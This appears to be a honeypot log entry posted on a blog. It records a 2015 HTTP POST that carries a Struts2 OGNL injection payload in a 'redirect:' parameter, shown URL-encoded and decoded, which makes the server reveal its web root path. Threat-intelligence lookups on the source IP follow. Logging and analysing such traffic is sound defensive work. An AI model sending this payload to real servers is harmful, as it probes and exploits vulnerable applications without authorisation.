BEGIN OF HTTP DATA:
2015-09-26 14:05:03
Source IP: 113.204.53.134
Country: CN RiskScore: 1 Malware: []
POST /unAuthorizedAccess.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 109.234.106.8
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive
redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
To make it better viewable
redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
113.204.53[.]134
Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/113.204.53.134
Static Source: panwdbl.appspot.com
- Comment: Listed in open blacklist
- Reference: https://panwdbl.appspot.com/lists/openbl.txt?n=99999999999999999999
Keine Kommentare:
Kommentar veröffentlichen